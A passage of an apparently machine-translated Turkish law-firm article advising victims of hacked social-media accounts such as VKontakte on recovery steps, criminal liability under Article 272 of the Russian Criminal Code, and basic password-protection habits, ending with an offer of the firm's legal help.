• tanıdıkların veya yabancıların hileli eylemlerinin bir sonucu olarak (kombinasyon, gadget'ın sahibinin yokluğundan yararlanarak bir bilgisayarda veya akıllı telefonda casusluk yapıldığında).

Not!

Saldırganın eylem yöntemi ne olursa olsun, cezai olarak cezalandırılırlar. Corpus delicti, Art'a göre oluşturulmuştur. Rusya Federasyonu Ceza Kanunu'nun 272'si (bilgisayar bilgilerine yasa dışı erişim).

Hacklendiyseniz ne yapmalısınız?

Sosyal ağ Vkontakte veya başka herhangi bir hack kurbanı olduysanız, yapmanız gereken ilk şey, hesabınızı bloke etme talebiyle destek hizmetine başvurmaktır. Profilin sahibi olduğunuza dair bazı kanıtlar sağlamanız gerekebilir.

Çalınan şifre sosyal ağlar, e-posta vb. Başka bir yerde ayarlanmışsa, diğer tüm hizmetlerdeki kombinasyonları değiştirmek gerekir.

Not!

Bilgisayar güvenliği uzmanları, farklı sitelerde aynı parolanın kullanılmasını önermez çünkü bu gibi durumlarda bir hesabı ele geçiren saldırganlar diğerlerini de kolaylıkla hackleyebilir.

Tüm arkadaşlar, akrabalar ve tanıdıklar, profilinizin saldırıya uğradığı konusunda uyarılmalıdır. Saldırganlar, sizin adınıza kötü amaçlı bağlantılar veya yardım talepleri içeren çeşitli mesajlar göndermeye çalışabilir. Arkadaşlarınız inanıp linke tıklar veya mesajda belirtilen hesaba veya cep telefonu numarasına para aktarırsa zarar görebilir.

Suçlunun eylemleri size ciddi zarar verdiyse, kolluk kuvvetlerine başvurmanız mantıklıdır. Bunu yapmak için, polise, faillerin Sanat uyarınca adalete teslim edilmesi talebini içermesi gereken bir ifade yazmanız gerekecektir. Rusya Federasyonu Ceza Kanunu'nun 272'si. Bu madde kapsamında, yetkisiz erişim yalnızca şu durumlarda suç sayılacaktır:

• yerlebir edilmiş;
• bloke;
• değiştirilmiş;
• kopyalandı.

Engellemenin, diğer şeylerin yanı sıra, meşru kullanıcılar tarafından verilere erişimin kasıtlı olarak engellenmesi anlamına geldiği göz önüne alındığında, bir VK şifresinin çalınması, Sanatın yaptırımları kapsamına girer. Rusya Federasyonu Ceza Kanunu'nun 272'si.

Bu tür eylemler için aşağıdaki ceza türleri sağlanır:

• 200.000 rubleye kadar para cezası (veya suçlunun 18 aylık maaşı tutarında);
• 1 yıla kadar ıslah çalışması;
• özgürlüğün kısıtlanması, zorla çalıştırma veya 2 yıla kadar hapis cezası.

Mahkeme, davayı incelerken, listelenen cezalardan hangisinin uygulanacağına karar verecektir. Diğer şeylerin yanı sıra, hesap sahibine ve diğer kişilere verilen zararın derecesine bağlı olacaktır. Büyük hasara neden olduysa (1.000.000 ruble'den fazla), para cezası miktarı 300.000 ruble'ye ve hapis cezası - 4 yıla kadar çıkabilir.

Not!

Ticari bir şirketin hesabının hacklenmesi durumunda büyük zararlar meydana gelebilir. Bu gibi durumlarda, davetsiz misafirlerin eylemleri sonucunda zarar görmüş olan ticari itibarın korunmasından da bahsedebiliriz.

Kendinizi şifre hırsızlığından nasıl korursunuz?

Kendinizi hırsızlıktan korumak için nasıl davranmanız gerektiğine dair iyi tanımlanmış ve anlaşılır kurallar vardır:

• özellikle doğum tarihiniz, adınız ve soyadınız gibi çok basit kombinasyonlar kullanmayın. Kırılmaları çok kolaydır. Pekala, şifre bir dizi tutarsız harf, rakam, birkaç noktalama işaretinden oluşacaksa;
• şüpheli bağlantıları takip etmeyin, verilerinizi şüpheli sitelere girmeyin;
• şifrelerinizi tanımadığınız cihazlara kaydetmeyin veya daha iyisi, tarayıcılara asla kaydetmeyin;
• halka açık wi-fi ağlarından hesaplarınıza giriş yapmamaya çalışın;
• mümkünse KeePass gibi bir şifre kasası kullanın.

Halihazırda davetsiz misafirlerin kurbanı olduysanız, lütfen yardım için avukatlarımızla iletişime geçin. İfadenin hazırlanmasından polise gönderilmesine ve duruşmaya kadar her aşamada yardımcı olacaklardır. Bizi arayın veya mesajınızı siteye bırakın.